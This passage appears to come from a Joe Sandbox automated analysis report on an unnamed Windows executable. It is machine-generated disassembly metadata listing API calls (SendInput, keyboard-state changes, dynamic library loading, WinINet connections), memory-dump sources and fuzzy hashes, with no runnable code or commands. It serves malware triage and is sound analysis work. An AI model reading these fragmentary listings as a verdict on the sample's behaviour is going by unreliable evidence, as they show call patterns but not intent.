                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0051A513
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Long
                                                                                                                                                                              • String ID: SysTreeView32
                                                                                                                                                                              • API String ID: 847901565-1698111956
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 005057E7
                                                                                                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0050581D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CrackInternet_memset
                                                                                                                                                                              • String ID: ?KP$|
                                                                                                                                                                              • API String ID: 1413715105-1839330679
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0051A74F
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0051A75D
                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0051A764
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                                                                                                              • String ID: msctls_updown32
                                                                                                                                                                              • API String ID: 4014797782-2298589950
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0051983D
                                                                                                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0051984D
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00519872
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$MoveWindow
                                                                                                                                                                              • String ID: Listbox
                                                                                                                                                                              • API String ID: 3315199576-2633736733
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0051A27B
                                                                                                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0051A290
                                                                                                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0051A29D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID: msctls_trackbar32
                                                                                                                                                                              • API String ID: 3850602802-1010561917
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,004D3028,?), ref: 004D2F79
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004D2F80
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoInitialize$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-340411864
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004D2F4E), ref: 004D304E
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004D3055
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                                                                                                              • API String ID: 2574300362-2819208100
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LocalTime__swprintf
                                                                                                                                                                              • String ID: %.3d$WIN_XPe
                                                                                                                                                                              • API String ID: 2070861257-2409531811
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE6D9,?,004CE55B,0054DC28,?,?), ref: 004CE6F1
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004CE703
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-3024904723
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,004CE69C,75570AE0,004CE5AC,0054DC28,?,?), ref: 004CE6B4
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004CE6C6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-192647395
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0050EBAF,?,0050EAAC), ref: 0050EBC7
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0050EBD9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                                                              • API String ID: 2574300362-1816364905
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,?,004F135F,?,004F1440), ref: 004F1389
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004F139B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                              • API String ID: 2574300362-1071820185
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004F1371,?,004F1519), ref: 004F13B4
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004F13C6
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                                              • API String ID: 2574300362-1587604923
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00513AC2,?,00513CF7), ref: 00513ADA
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00513AEC
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                              • API String ID: 2574300362-4033151799
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00506AA6), ref: 004BAB2D
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004BAB49
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper_wcscmp
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 820872866-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00510D85
                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00510DC8
                                                                                                                                                                                • Part of subcall function 00510458: CharLowerBuffW.USER32(?,?,?,?), ref: 00510478
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00510FB2
                                                                                                                                                                              • _memmove.LIBCMT ref: 00510FC2
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3659485706-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0050AF56
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 0050AF61
                                                                                                                                                                                • Part of subcall function 004F1050: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004F10B8
                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0050AF6C
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0050B23F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 780911581-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3877424927-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0051C354
                                                                                                                                                                              • ScreenToClient.USER32(?,00000002), ref: 0051C384
                                                                                                                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0051C3EA
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                                                              • Opcode ID: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                                                                                                                                              • Instruction ID: 4422f4b5c38a6cd6fc3a634d09ccb8b61ab6a904293cf9b8b0eadad0217002cd
                                                                                                                                                                              • Opcode Fuzzy Hash: a283aa5cf01b0232632478e96d108285d55695cf6e876888d78fdd626ed98b5a
                                                                                                                                                                              • Instruction Fuzzy Hash: 68517B31A00204EFEF20DF68D880AEE7FB6BB55360F248559F8259B290D771ED81DB90
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004ED258
                                                                                                                                                                              • __itow.LIBCMT ref: 004ED292
                                                                                                                                                                                • Part of subcall function 004ED4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004ED549
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004ED2FB
                                                                                                                                                                              • __itow.LIBCMT ref: 004ED350
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$__itow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3379773720-0
                                                                                                                                                                              • Opcode ID: 8dd9792a5d72c9900165eed55de0e0a267c6e7e72f8fd14209a331616d966437
                                                                                                                                                                              • Instruction ID: f439645b11a4d5579c2fe456fd83c06c3b059672f97f1e3e18a1e2803ae372f6
                                                                                                                                                                              • Opcode Fuzzy Hash: 8dd9792a5d72c9900165eed55de0e0a267c6e7e72f8fd14209a331616d966437
                                                                                                                                                                              • Instruction Fuzzy Hash: 0C41E671A00249ABDF11DF56C842BEF7BB9AF58705F00005FFA05A3291DB789A45CB6A
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004FEF32
                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 004FEF58
                                                                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004FEF7D
                                                                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004FEFA9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                                                              • Opcode ID: a471fc4f47ba6268cc1aa260bae790c5e8666a0ba40c6ef3a6bdbdea2a0c2923
                                                                                                                                                                              • Instruction ID: d9e8d9f90eeb79a8fa8a86b1af4bcd2cd1b529911bad5e6058e46823663e1982
                                                                                                                                                                              • Opcode Fuzzy Hash: a471fc4f47ba6268cc1aa260bae790c5e8666a0ba40c6ef3a6bdbdea2a0c2923
                                                                                                                                                                              • Instruction Fuzzy Hash: 64416C39600611DFCB10EF16C544A5ABBF5EF88324B18809EE945AF362DB78FD01DBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0051B3E1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InvalidateRect
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 634782764-0
                                                                                                                                                                              • Opcode ID: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                                                                                                                                              • Instruction ID: af682b03fa785d0868b225631e6514240b63fa820b6135b70ed39b564d8cc7b6
                                                                                                                                                                              • Opcode Fuzzy Hash: b2e0f4ddab85e807db2bdc24cfadd4ee22b68e5129fa7c248adfe5368fb35810
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E319034600204EFFF249E58DC85FE83F66BB05350F54C916FA61D62A2C7B0E9D4AB61
                                                                                                                                                                              APIs
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051D617
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0051D68D
                                                                                                                                                                              • PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 0051D70E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                                                              • Opcode ID: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                                                                                                                                              • Instruction ID: ad77445d79938f4c63deb8947b5f10376097fb3f01477646964d718debed4c75
                                                                                                                                                                              • Opcode Fuzzy Hash: 068cf751805594ce1ed92d983e51dfa1cbba26cc1f0e0f639a3fcdc7093f14e9
                                                                                                                                                                              • Instruction Fuzzy Hash: 85418D35600619DFEB11CF98E884BE9BFF5FB55300F1881AAE4599B291D730E885EB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 004F44EE
                                                                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 004F450A
                                                                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004F456A
                                                                                                                                                                              • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 004F45C8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 432972143-0
                                                                                                                                                                              • Opcode ID: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                                                                                                                                              • Instruction ID: 6f01a0dfa84a084423ed1e51ca9aa0b515a5510356f17a2b6788c06e40031a6f
                                                                                                                                                                              • Opcode Fuzzy Hash: caff641162b6e27fbbd957de4991be57fbdef9dc00790c18ea8d400e33f1324a
                                                                                                                                                                              • Instruction Fuzzy Hash: 21311271A0025C7BEF20AB6498087BF7BB59B89314F04121BF381923C1CB7C8A49976A
                                                                                                                                                                              APIs
                                                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004E4DE8
                                                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 004E4E16
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E44
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004E4E7A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00517AB6
                                                                                                                                                                                • Part of subcall function 004F69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F69E3
                                                                                                                                                                                • Part of subcall function 004F69C9: GetCurrentThreadId.KERNEL32 ref: 004F69EA
                                                                                                                                                                                • Part of subcall function 004F69C9: AttachThreadInput.USER32(00000000,?,004F8127), ref: 004F69F1
                                                                                                                                                                              • GetCaretPos.USER32(?), ref: 00517AC7
                                                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 00517B00
                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00517B06
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051EFE2
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0052F3C3,?,?,?,?,?), ref: 0051EFF7
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051F041
                                                                                                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0052F3C3,?,?,?), ref: 0051F077
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2864067406-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005049B7
